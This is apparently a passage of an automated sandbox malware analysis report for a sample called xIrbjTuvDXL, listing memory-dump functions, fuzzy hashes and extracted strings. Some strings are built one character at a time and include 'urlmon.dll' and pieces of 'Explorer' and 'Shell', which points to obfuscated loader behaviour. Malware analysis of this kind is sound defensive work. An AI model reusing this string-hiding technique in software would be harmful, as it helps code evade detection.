Opcode Fuzzy Hash: 178c32d8e1404a5789e4a2b4f9abf3e5fd93f9c54762f527bd92632bee4a25b9
Instruction Fuzzy Hash: 5801E9B6C11258AF8B40DFE8D9419EEBBF9AF08600F14426AE909F3240F7745A048FA1

Function 02CB586B Relevance: .1, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4487721916.0000000002AA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2aa0000_xIrbjTuvDXL.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a43f2535436753f872ca79be1d6bdc287b27bb05366904cbed03e86c391883c
Instruction ID: 116f31285cbf4d8031a742321636d71944a055cda7c94e55dc199e84f36b0a18
Opcode Fuzzy Hash: 7a43f2535436753f872ca79be1d6bdc287b27bb05366904cbed03e86c391883c
Instruction Fuzzy Hash: E441EBB1D11229AFDB04CF99C885AEEBBBCFF49710F50415AFA14E6240E7B19641CBA4

Function 02CDA501 Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4487721916.0000000002AA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2aa0000_xIrbjTuvDXL.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e49d7d781ca1d42782ed8ed3baac62c4f9d5a224fa7d698913f86c307f43200a
Instruction ID: 9c5f1579eb211cd220b44b9e1f26526b5f862980fd0f9c0c0e1005d66544c0d9
Opcode Fuzzy Hash: e49d7d781ca1d42782ed8ed3baac62c4f9d5a224fa7d698913f86c307f43200a
Instruction Fuzzy Hash: 44311CB5A00648AFDB24DF58C881EDFB7B9EF89300F108209F918A7240D774A911CFA1

Function 02CDAE41 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4487721916.0000000002AA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2aa0000_xIrbjTuvDXL.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a1bdd7762dbb37f2361fb4664322d838bbadab6eb27eab88a1dcf778f622d32
Instruction ID: 9dd09a30cace3c1adf1aced0dd7ed18cc2a5dff9948a0ef8e7c2657fcb963cc5
Opcode Fuzzy Hash: 6a1bdd7762dbb37f2361fb4664322d838bbadab6eb27eab88a1dcf778f622d32
Instruction Fuzzy Hash: 8E210AB1A00209AFDB14DF98DC41EEFB7B9EF88300F00851AF91997240D774A951CFA1

Function 02CC9961 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4487721916.0000000002AA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2aa0000_xIrbjTuvDXL.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7058cc763f1e037f9ef1ad2052d21270ed5e1d0541c0bfc6aaf84d6af7122c89
Instruction ID: 9c050de20b05da35b68a30b3ac31d5c1ba82e1c7440161275ea0f1663da40b1b
Opcode Fuzzy Hash: 7058cc763f1e037f9ef1ad2052d21270ed5e1d0541c0bfc6aaf84d6af7122c89
Instruction Fuzzy Hash: 8E11A9723803057BF7209A599C43FAB775DDB84B14F244019FF08AE2C1D6B5F91196B8

Function 02CDA311 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4487721916.0000000002AA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2aa0000_xIrbjTuvDXL.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16c797236095ebb5135ad2d4b33628f1c70fb897fe7ea92cf3538fbd2cf386a6
Instruction ID: 7df0b5e8605a900c2cef00eb9fd83071dc36fec1671d7ff86eb6c78b27ab8ec1
Opcode Fuzzy Hash: 16c797236095ebb5135ad2d4b33628f1c70fb897fe7ea92cf3538fbd2cf386a6
Instruction Fuzzy Hash: DC118EB1A003486FDB24EB689C45FEF77ADDF85300F00854AFA586B280D7716901CBA1

Function 02CDA191 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4487721916.0000000002AA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2aa0000_xIrbjTuvDXL.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9913a80b96fa5c571731b646c582ccaaabc0803a115ac40e267f1b348eaffa2
Instruction ID: 5ed40edd8cdcc9e841e8b39a623e3616403c243418e0a5dd4aa72f335109700a
Opcode Fuzzy Hash: c9913a80b96fa5c571731b646c582ccaaabc0803a115ac40e267f1b348eaffa2
Instruction Fuzzy Hash: 1F115E71A003487FDB24EBA8DC45FEF77A9EF85700F00854AFA185B240D7756951CBA1

Function 02CD6EF1 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4487721916.0000000002AA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2aa0000_xIrbjTuvDXL.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1c6a783601ab8c83d8ca271c2313478de2960171d64b133c0188f3d1af880bc
Instruction ID: f40c6f57e5e6f8cfb77f0e5e14e85e7807a293a3dead096350c8b53c3bb66b4d
Opcode Fuzzy Hash: a1c6a783601ab8c83d8ca271c2313478de2960171d64b133c0188f3d1af880bc
Instruction Fuzzy Hash: 4A21EFB6D01218AF8B00DFA9D9419EEB7F9FF88210F14426AE919E7200E7715A05CFA1

Function 02CD8231 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4487721916.0000000002AA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2aa0000_xIrbjTuvDXL.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34f7005628e5b7193a18477d2fe65d11baee78c739b6347420c58b3b972b2aaa
Instruction ID: fc3f66c8da829ed47b9641955d7e2459bfff15a48b0bb354fc34723a0e52c9d7
Opcode Fuzzy Hash: 34f7005628e5b7193a18477d2fe65d11baee78c739b6347420c58b3b972b2aaa
Instruction Fuzzy Hash: 0D110DB6D01218AF9B00DFA9D8419EEBBF9EF48600F14466AE909E7200E7705A05CFA1

Function 02CDB1C1 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4487721916.0000000002AA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2aa0000_xIrbjTuvDXL.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e95764a33c8cb1fca4e2c6aa4495904ddcd1e1733e80192e71f584631693ad5
Instruction ID: dd3e7882e9ca99be01a8b292d79754518731747edfd00ed9599889c08d9f574e
Opcode Fuzzy Hash: 5e95764a33c8cb1fca4e2c6aa4495904ddcd1e1733e80192e71f584631693ad5
Instruction Fuzzy Hash: E501C0B2204608BBCB04DE99DC80EDB77ADEF8C710F408209BA19E3240D630F851CBA4

Function 02CB59BB Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4487721916.0000000002AA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2aa0000_xIrbjTuvDXL.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dde5f6a206536ad24073c56a7e73f3309fd5228819be611eacadea3da88d82d6
Instruction ID: c2f6acd07e925913a550eabe1b274de7d398c6c3439d484d5c7fb379bb240f20
Opcode Fuzzy Hash: dde5f6a206536ad24073c56a7e73f3309fd5228819be611eacadea3da88d82d6
Instruction Fuzzy Hash: 4BF05973A002066BD7104B1DAC80BCAB78CEF88338F640222FA5CD7281E671D452C7A0

Function 02CC9B1A Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4487721916.0000000002AA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2aa0000_xIrbjTuvDXL.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8924cf88bad9422fc18bf1f57789eb07afaf3bd383e4b8d5917ecef74d87e778
Instruction ID: 150e80920bd4de9dad1c06c66e3a4911627f92d451d7b554008f2229ae8367b9
Opcode Fuzzy Hash: 8924cf88bad9422fc18bf1f57789eb07afaf3bd383e4b8d5917ecef74d87e778
Instruction Fuzzy Hash: 94F062719002187EDF10ABF09C55EFE73799B8C310F104299EA0863140E7709E458FA5

Function 02CDA411 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4487721916.0000000002AA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2aa0000_xIrbjTuvDXL.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d2ef3091919b25f6fa819f84b1a155381d9f4f4b135b5edac85c36048870f971
Instruction ID: da3d4907e04e5b49d275a477d5f540f8619c6555986f4363ddd3f57628ff9e63
Opcode Fuzzy Hash: d2ef3091919b25f6fa819f84b1a155381d9f4f4b135b5edac85c36048870f971
Instruction Fuzzy Hash: EEF01CB62002097BCB10DE99DC81E9B77ADEFC9720F40811ABE18A7241D670B9118BB0

Function 02CC9A81 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4487721916.0000000002AA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2aa0000_xIrbjTuvDXL.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e844169f80565f97cc18df499238d2eebe4e5d134608ec7d98d41ad2a49e24fa
Instruction ID: 02b8c1433d005ea890d63660f3a0fbb63ef1ebef6b9d6588dbc4d91c0b8596f7
Opcode Fuzzy Hash: e844169f80565f97cc18df499238d2eebe4e5d134608ec7d98d41ad2a49e24fa
Instruction Fuzzy Hash: 17F08271815208EBDB14CF64D841BDEBBB4EB44320F20436EE8299B2C0D63597509B81

Function 02CDB0E1 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4487721916.0000000002AA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2aa0000_xIrbjTuvDXL.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e8f804e6e2566f97d4133197ec8a822201c655ac3a2fa4d2fbee59e578fcff7
Instruction ID: 3024674e15f4d67b370fff1cbe2c8635c3253e466da7573e55a004b64d234648
Opcode Fuzzy Hash: 8e8f804e6e2566f97d4133197ec8a822201c655ac3a2fa4d2fbee59e578fcff7
Instruction Fuzzy Hash: 19E065B2300208BFDA14EE59EC85FDB73ADEFC9710F40400AFA18A7241D731B9108AB5

Function 02CC9A7E Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4487721916.0000000002AA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2aa0000_xIrbjTuvDXL.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a8a2f41192848a2a9c7c288ba1b486081d6e8814e3e5f8f3845d95ba6deab24
Instruction ID: f727fb998f53d4a0aa1f85bc91551ef3585654b94b101dedf0d1ec5e7cad592b
Opcode Fuzzy Hash: 7a8a2f41192848a2a9c7c288ba1b486081d6e8814e3e5f8f3845d95ba6deab24
Instruction Fuzzy Hash: E6F09271865108EBDB08CFA4E841BEEBB78DB45320F20436EE919DB280D635C7919B81

Function 02CDCFD1 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4487721916.0000000002AA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2aa0000_xIrbjTuvDXL.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 566983493f3b0ad038004870b7e3d902811479f30a7aef9b7590a4c5ec5d040b
Instruction ID: d8acd4ca5c69c689c3cab66e50c9936145749ad710ae346195c95aa3c9834b10
Opcode Fuzzy Hash: 566983493f3b0ad038004870b7e3d902811479f30a7aef9b7590a4c5ec5d040b
Instruction Fuzzy Hash: 44E08C33A0022437D62066899C05FBBB7ADDBC5F60F894079FF089B341E675FA0186E4

Function 02CDADB1 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4487721916.0000000002AA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2aa0000_xIrbjTuvDXL.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f104d03abdedf1f8787786e7aaafcefc6a5242dd07684567bd9e54fffbad41ec
Instruction ID: 86119c834d00a4175fbcf258cf5eb68661bae5efaf7b6fbdcd38af0cbb12e159
Opcode Fuzzy Hash: f104d03abdedf1f8787786e7aaafcefc6a5242dd07684567bd9e54fffbad41ec
Instruction Fuzzy Hash: 71E046762002447BD620AA6AEC41EAB7B6DDFC5760F408016FA08A7281C676B9118BF4

Non-executed Functions

Function 02CC589B Relevance: 51.4, Strings: 41, Instructions: 168COMMON

Download Yara Rule

Strings

@@@@, xrefs: 02CC5A7C
@@@@, xrefs: 02CC5A98
@@@@, xrefs: 02CC5A36
@@@@, xrefs: 02CC5A67
@@@@, xrefs: 02CC5AC9
@@@@, xrefs: 02CC5A59
@@@@, xrefs: 02CC5AC2
%&'(, xrefs: 02CC59BE
@@@@, xrefs: 02CC5A21
@@@@, xrefs: 02CC5A52
@@@@, xrefs: 02CC59E6
@@@@, xrefs: 02CC5A2F
@@@@, xrefs: 02CC5AB4
@@@@, xrefs: 02CC5AA6
!"#$, xrefs: 02CC59B4
@@@@, xrefs: 02CC5AAD
123@, xrefs: 02CC59DC
@@@@, xrefs: 02CC5A4B
@@@@, xrefs: 02CC59F7
@@@@, xrefs: 02CC5A3D
@@@@, xrefs: 02CC5A1A
@@@@, xrefs: 02CC5A60
@@@@, xrefs: 02CC5A8A
@@@@, xrefs: 02CC5A83
@@@@, xrefs: 02CC5996
@@@@, xrefs: 02CC5A0C
@@@@, xrefs: 02CC5A13
@@@@, xrefs: 02CC5A75
@@@@, xrefs: 02CC5A9F
)*+,, xrefs: 02CC59C8
-./0, xrefs: 02CC59D2
@@@@, xrefs: 02CC5A05
@@@@, xrefs: 02CC5A28
@@@@, xrefs: 02CC5A6E
@@@@, xrefs: 02CC59F0
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@, xrefs: 02CC5B14
@@@@@@@@, xrefs: 02CC5AE0
@@@@, xrefs: 02CC5ABB
@@@@, xrefs: 02CC59FE
@@@@, xrefs: 02CC5A44
@@@@, xrefs: 02CC5A91

Memory Dump Source

Source File: 00000005.00000002.4487721916.0000000002AA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2aa0000_xIrbjTuvDXL.jbxd

Yara matches

Similarity

API ID:
String ID: !"#$$%&'($)*+,$-./0$123@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@@@@@$@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@
API String ID: 0-3248090998
Opcode ID: 0f7a4fd8f7b655483329baa91f09f2e6996ce8fa421a67e065eb64a4af2a6fc6
Instruction ID: c772104156f1acb8a9b3171070df90652f4bf7bcbfecb297ac6509b6d78f6858
Opcode Fuzzy Hash: 0f7a4fd8f7b655483329baa91f09f2e6996ce8fa421a67e065eb64a4af2a6fc6
Instruction Fuzzy Hash: 1A91FEF09052A88ACB118F55A5603DFBF71BB85204F1581E9C6AA7B243C3BE4E45DF90

Function 02CBBEE2 Relevance: 35.2, Strings: 28, Instructions: 154COMMON

Download Yara Rule

Strings

v", xrefs: 02CBC206
WA, xrefs: 02CBC00C
vO, xrefs: 02CBBF7A
", xrefs: 02CBC257
1, xrefs: 02CBC0FC
-, xrefs: 02CBBFC4
#, xrefs: 02CBC048
t, xrefs: 02CBC106
y, xrefs: 02CBC24D
b, xrefs: 02CBC26C
:, xrefs: 02CBC162
d, xrefs: 02CBC124
?%, xrefs: 02CBC339
c}, xrefs: 02CBC1AF
:, xrefs: 02CBC18A
(, xrefs: 02CBC2C3
+, xrefs: 02CBC0CE
^, xrefs: 02CBC2D7
6, xrefs: 02CBC08B
<V, xrefs: 02CBC21A
Pf, xrefs: 02CBC2F2
], xrefs: 02CBBF92
T, xrefs: 02CBC034
-O, xrefs: 02CBC1CD
(, xrefs: 02CBC0B0
C, xrefs: 02CBC110
8L, xrefs: 02CBBFCE
,, xrefs: 02CBC1A5

Memory Dump Source

Source File: 00000005.00000002.4487721916.0000000002AA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2aa0000_xIrbjTuvDXL.jbxd

Yara matches

Similarity

API ID:
String ID: "$#$($($+$-$-O$1$8L$:$:$<V$?%$C$Pf$T$WA$]$^$b$c}$d$t$v"$vO$y$,$6
API String ID: 0-2981804867
Opcode ID: 4a9d241e6905c4152f6bf08ffcd171d5158c73e81f468ede907530ab2caa2d87
Instruction ID: 931cdbefce2ae8c3ba4419e43665c1c328d2a0b30d9c4353d9b8f86e3d7f5b7a
Opcode Fuzzy Hash: 4a9d241e6905c4152f6bf08ffcd171d5158c73e81f468ede907530ab2caa2d87
Instruction Fuzzy Hash: DFB149B0D05669CFEB65CF91C9987DEBBB1BB45308F5081C9C5583B281C7BA0A89CF91

Function 02CBBF17 Relevance: 35.1, Strings: 28, Instructions: 146COMMON

Download Yara Rule

Strings

v", xrefs: 02CBC206
WA, xrefs: 02CBC00C
vO, xrefs: 02CBBF7A
", xrefs: 02CBC257
1, xrefs: 02CBC0FC
-, xrefs: 02CBBFC4
#, xrefs: 02CBC048
t, xrefs: 02CBC106
y, xrefs: 02CBC24D
b, xrefs: 02CBC26C
:, xrefs: 02CBC162
d, xrefs: 02CBC124
?%, xrefs: 02CBC339
c}, xrefs: 02CBC1AF
:, xrefs: 02CBC18A
(, xrefs: 02CBC2C3
+, xrefs: 02CBC0CE
^, xrefs: 02CBC2D7
6, xrefs: 02CBC08B
<V, xrefs: 02CBC21A
Pf, xrefs: 02CBC2F2
], xrefs: 02CBBF92
T, xrefs: 02CBC034
-O, xrefs: 02CBC1CD
(, xrefs: 02CBC0B0
C, xrefs: 02CBC110
8L, xrefs: 02CBBFCE
,, xrefs: 02CBC1A5

Memory Dump Source

Source File: 00000005.00000002.4487721916.0000000002AA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2aa0000_xIrbjTuvDXL.jbxd

Yara matches

Similarity

API ID:
String ID: "$#$($($+$-$-O$1$8L$:$:$<V$?%$C$Pf$T$WA$]$^$b$c}$d$t$v"$vO$y$,$6
API String ID: 0-2981804867
Opcode ID: c5507b4ad178fd812d3906bff3fc65128b4358a1538bf379664768e9bc669b27
Instruction ID: 3723a36cb49d9c203765a111e45328d985924b2ccbe625f8494cf59079e87e43
Opcode Fuzzy Hash: c5507b4ad178fd812d3906bff3fc65128b4358a1538bf379664768e9bc669b27
Instruction Fuzzy Hash: DEB134B0D0526DCBEB61CF81C9987DEBBB1BB05308F5081D9C5583B281C7BA1A89CF95

Function 02CD43B1 Relevance: 34.0, Strings: 27, Instructions: 264COMMON

Download Yara Rule

Strings

5, xrefs: 02CD445D
F, xrefs: 02CD448E
J, xrefs: 02CD44CD
H, xrefs: 02CD4480
Q, xrefs: 02CD4487
%, xrefs: 02CD4597
., xrefs: 02CD464C
v, xrefs: 02CD43E5
$, xrefs: 02CD440D
s, xrefs: 02CD443F
$, xrefs: 02CD4449
i, xrefs: 02CD4653
), xrefs: 02CD43F9
g, xrefs: 02CD4421
}, xrefs: 02CD4417
w, xrefs: 02CD446B
>, xrefs: 02CD43EF
B, xrefs: 02CD44C6
h, xrefs: 02CD43DB
u, xrefs: 02CD442B
}, xrefs: 02CD4435
F, xrefs: 02CD4479
T, xrefs: 02CD449C
), xrefs: 02CD4453
m, xrefs: 02CD4464
urlmon.dll, xrefs: 02CD45F3, 02CD45F6
E, xrefs: 02CD4472

Memory Dump Source

Source File: 00000005.00000002.4487721916.0000000002AA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2aa0000_xIrbjTuvDXL.jbxd

Yara matches

Similarity

API ID:
String ID: $$$$%$)$)$.$5$>$B$E$F$F$H$J$Q$T$g$h$i$m$s$u$urlmon.dll$v$w$}$}
API String ID: 0-1002149817
Opcode ID: 0cbffaeb162f1786b2793b71a71084db2c5a61a1cb5fad4a1fbe7ff9f8dc0e75
Instruction ID: 3b34de674ddc7c3a6b358172ccd0c2adeafca4ef97ea5b666be63cf3701fe7a7
Opcode Fuzzy Hash: 0cbffaeb162f1786b2793b71a71084db2c5a61a1cb5fad4a1fbe7ff9f8dc0e75
Instruction Fuzzy Hash: 56C141B1D00268AEDF21DFA4CC44BEEBBB9AF45304F1081D9D64CA7241E7B55A88DF61

Function 02CCC961 Relevance: 17.7, Strings: 14, Instructions: 194COMMON

Download Yara Rule

Strings

F, xrefs: 02CCCA08
s, xrefs: 02CCCA16
l, xrefs: 02CCCA0F
@4>J, xrefs: 02CCCAA0
., xrefs: 02CCC992
r, xrefs: 02CCC9FA
o, xrefs: 02CCC9D0
e, xrefs: 02CCC9C9
m, xrefs: 02CCCA01
i, xrefs: 02CCC9C2
, xrefs: 02CCC9BB
o, xrefs: 02CCC9F3
x, xrefs: 02CCC99C
P, xrefs: 02CCC9EC

Memory Dump Source

Source File: 00000005.00000002.4487721916.0000000002AA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2aa0000_xIrbjTuvDXL.jbxd

Yara matches

Similarity

API ID:
String ID: $.$@4>J$F$P$e$i$l$m$o$o$r$s$x
API String ID: 0-1771628126
Opcode ID: 911a8a17652c8da693b9bdff70edcab97e09a32db775334962d3d65141a60104
Instruction ID: 6bbaf5230858d33ab80c6cdfb46828932ae02babdc587a9305b98f8b6232f478
Opcode Fuzzy Hash: 911a8a17652c8da693b9bdff70edcab97e09a32db775334962d3d65141a60104
Instruction Fuzzy Hash: 4D7120B2D11218AEDB51DB94CC81FDEB7BDAF48700F008199E60DAA140EB756B489FA1

Function 02CB5682 Relevance: 16.3, Strings: 13, Instructions: 43COMMON

Download Yara Rule

Strings

WIU, xrefs: 02CB5722
G)3G, xrefs: 02CB56AB
QIWIWIU, xrefs: 02CB573C, 02CB5745
G0(0, xrefs: 02CB56B9
WVWW, xrefs: 02CB56E3
UQIW, xrefs: 02CB56FF
VWVG, xrefs: 02CB56EA
RIWG, xrefs: 02CB5696
QS\G, xrefs: 02CB56C0
QIWN, xrefs: 02CB56CE
QIU\, xrefs: 02CB56B2
g, xrefs: 02CB5731
QIWI, xrefs: 02CB571B

Memory Dump Source

Source File: 00000005.00000002.4487721916.0000000002AA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2aa0000_xIrbjTuvDXL.jbxd

Yara matches

Similarity

API ID:
String ID: G)3G$G0(0$QIU\$QIWI$QIWIWIU$QIWN$QS\G$RIWG$UQIW$VWVG$WIU$WVWW$g
API String ID: 0-4202404308
Opcode ID: abd41502172c2e770f3f710e253843c5fcb89e3fb34d92dbeb16ff64d87f68b3
Instruction ID: 2a82082b7379b4bf4a8599b6cde9fbd114bd32bafccdd15ca7f131b247aa10e1
Opcode Fuzzy Hash: abd41502172c2e770f3f710e253843c5fcb89e3fb34d92dbeb16ff64d87f68b3
Instruction Fuzzy Hash: 8D11ECB0C14289EECB00DFE2D9995DEFFB1BB04718F608458DA683E640C3B14A86CF85

Function 02CC0619 Relevance: 13.8, Strings: 11, Instructions: 90COMMON

Download Yara Rule

Strings

D, xrefs: 02CC06A7
n, xrefs: 02CC06B5
r, xrefs: 02CC066A
l, xrefs: 02CC065C
e, xrefs: 02CC0678
r, xrefs: 02CC0663
w, xrefs: 02CC06AE
e, xrefs: 02CC0671
\, xrefs: 02CC064E
x, xrefs: 02CC0655
i, xrefs: 02CC06BC

Memory Dump Source

Source File: 00000005.00000002.4487721916.0000000002AA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2aa0000_xIrbjTuvDXL.jbxd

Yara matches

Similarity

API ID:
String ID: D$\$e$e$i$l$n$r$r$w$x
API String ID: 0-685823316
Opcode ID: 4c4a431ccb98f0cdf5d831e89f83757848091b4bd658196eed94ea2dbe220d13
Instruction ID: cc6dfc234d95e0e23530f6c4412586e62520b7ff29c8ebf5a2a3bc0dea8430e8
Opcode Fuzzy Hash: 4c4a431ccb98f0cdf5d831e89f83757848091b4bd658196eed94ea2dbe220d13
Instruction Fuzzy Hash: 413182B1D50218AADF40DFD4CC85BEEBBB9AF08704F10815DE608BA180DBB51648CFA4

Function 02CC7A8D Relevance: 10.1, Strings: 8, Instructions: 131COMMON

Download Yara Rule

Strings

m, xrefs: 02CC7B98
o, xrefs: 02CC7B84
i, xrefs: 02CC7B9F
x, xrefs: 02CC7ACA
r, xrefs: 02CC7B8E
e, xrefs: 02CC7BA6
., xrefs: 02CC7AC3
P, xrefs: 02CC7B7A

Memory Dump Source

Source File: 00000005.00000002.4487721916.0000000002AA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2aa0000_xIrbjTuvDXL.jbxd

Yara matches

Similarity

API ID:
String ID: .$P$e$i$m$o$r$x
API String ID: 0-620024284
Opcode ID: f5e0583fc2d84f72b15f30f7805fb963ff555d7b1f68539aeef7f1abcea791cc
Instruction ID: ab94dc03d0b0395d98515c0f1a8e6873f38d760468ade1ce7ef385f9741e0f7f
Opcode Fuzzy Hash: f5e0583fc2d84f72b15f30f7805fb963ff555d7b1f68539aeef7f1abcea791cc
Instruction Fuzzy Hash: 7A4184B2D10218AADB20EBA0CC44FEE777DEF59300F4085DDE609A7140EBB557889FA1

Function 02CD4C11 Relevance: 10.1, Strings: 8, Instructions: 119COMMON

Download Yara Rule

Strings

a, xrefs: 02CD4C96
L, xrefs: 02CD4C7A
S, xrefs: 02CD4C8F
l, xrefs: 02CD4C88
\, xrefs: 02CD4CD6
c, xrefs: 02CD4C81
@4>J, xrefs: 02CD4CC2
e, xrefs: 02CD4C9D

Memory Dump Source

Source File: 00000005.00000002.4487721916.0000000002AA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2aa0000_xIrbjTuvDXL.jbxd

Yara matches

Similarity

API ID:
String ID: @4>J$L$S$\$a$c$e$l
API String ID: 0-4139028360
Opcode ID: 1bb108f134bd4b877417346d2a4bbb4046abb4cefc92c583ac55de1a1dbe14bc
Instruction ID: 35b23028ee2b712adf4cef0a0b47e80bdb1335165575738e859643dd484c9eae
Opcode Fuzzy Hash: 1bb108f134bd4b877417346d2a4bbb4046abb4cefc92c583ac55de1a1dbe14bc
Instruction Fuzzy Hash: E54166B2D00618AECB14EFA4DC84BEEB7F9EF88314F05456ADA09A7100E7755A858F94

Function 02CB9061 Relevance: 8.8, Strings: 7, Instructions: 43COMMON

Download Yara Rule

Strings

p, xrefs: 02CB90B3
Q, xrefs: 02CB906F
z, xrefs: 02CB90A7
E, xrefs: 02CB907B
P, xrefs: 02CB909B
5, xrefs: 02CB9073
S, xrefs: 02CB90AB

Memory Dump Source

Source File: 00000005.00000002.4487721916.0000000002AA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02AA0000, based on PE: false

Joe Sandbox IDA Plugin

